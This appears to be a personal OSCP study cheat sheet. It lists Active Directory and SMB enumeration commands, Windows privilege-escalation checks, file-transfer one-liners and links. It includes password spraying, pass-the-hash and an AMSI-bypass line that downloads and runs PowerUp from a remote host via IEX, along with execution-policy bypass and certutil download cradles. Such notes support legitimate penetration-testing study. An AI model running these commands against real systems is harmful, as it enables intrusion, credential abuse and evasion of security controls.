My OSCP notes

Active Directory

Enumeration

SMB

SMBCLIENT

• no pass session

  smbclient --no-pass -L //<IP>
  

• Get list of shares on the target

  smbclient -L //<IP>/
  

• Login with no password and no username

  smbclient -L //<IP>/ -U '' -N
  

• Login with username

  smbclient -L //<IP>/ -U '<USERNAME>' -N
  

• Login with username and password

  smbclient -L //<IP>/ -U <USERNAME>%<PASSWORD>
  

• Connect to a share without login informations

  smbclient //<IP>/<SHARE>
  

• Download file from the target machine to our attack machine

  smb: \> get file_example.txt
  

• Download a malicious file from our attack machine to the target machine

  smb: \> put malicious_file
  

SMBMAP

• Null user session

  smbmap -H <IP> -P <PORT>
  

• With creds

  smbmap -u "<USERNAME>" -p "<PASSWORD>" -H <IP> -P <PORT>
  

CRACKMAPEXEC

• Enumeration of the share in the AD with Null user

  crackmapexec smb <IP> -u '' -p '' --shares
  

• Enumeration of the share in the AD with Guest user

  crackmapexec smb <IP> -u 'username' -p 'password' --shares
  

• Enumeration of the share in the AD with Guest user pass the hash

  crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares
  

• Passwords Spray

  crackmapexec <PROTOCOL> <IP>  -u <USER_LIST> -p <PASSWORD_LIST>
  

ENUM4LINUX

• run all enum4linux test at once

  enum4linux -a <IP>
  

LDAP

ldapsearch

• find information about ldap service

  ldapsearch -v -x -b "DC=domain,DC=lolo" -H "ldap://<IP> " > ldapsearch.txt
  

Priv esc

Common windows priv esc enumeration commands

• systeminfo

  systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 
  

• whoami

  whoami /priv 
  

• netstat

  netstat –ano   
  

• if you are not able to execute those commands, do this command

  set PATH=%SystemRoot%\system32;%SystemRoot%;
  

• PowerUp

  [Ref].Assembly.GetType('System.Management.Automation.Amsi'+"Utils").GetField("amsiInit"+"Failed","NonPublic,Static").SetValue($null,$true);IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1");Invoke-Allchecks;
  

File Transfer

• Wget

  wget http://ip:port/file_to_get   
  

• Curl

  curl http://ip:port/file_to_get --output file_to_get   
  

• Certutil For windows only

  certutil.exe -urlcache -split -f "http://ip/:port/file_to_get" C:\Users\Public\Downloads\file_to_get   
  

• SCP

  scp user@IP:C:/Users/file_to_get
  

• Powershell For windows only

  (New-Object System.Net.WebClient).DownloadFile("http://IP/file_to_get", "C:\Example\path\test\file_to_get") 
  

• You can also use these commands to bypass some restrictions

  C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass script_to_execute
  

  powershell.exe -ep bypass script_to_execute
  

• netcat
  • On the receiving machine

    nc -l -p <PORT> > file.out
    

  • On the sending machine

    nc -w 3 <IP> <PORT> < file.out
    

Find files in windows machine

  dir proof.txt /s /p

  dir *.txt /s /p

Find files in linux machine

  find /-type f -name *.txt

Important links

• AD Mind Map Last Version Orange Cyberdefense

• OSCP Priv Esc Note

• winPEAS.bat

• Active Directory Cheat sheet

• Best note for OSCP

• Step to make a Buffer Overflow

• Pivoting with chisel

• Pivoting with sshuttle and proxychains

• chisel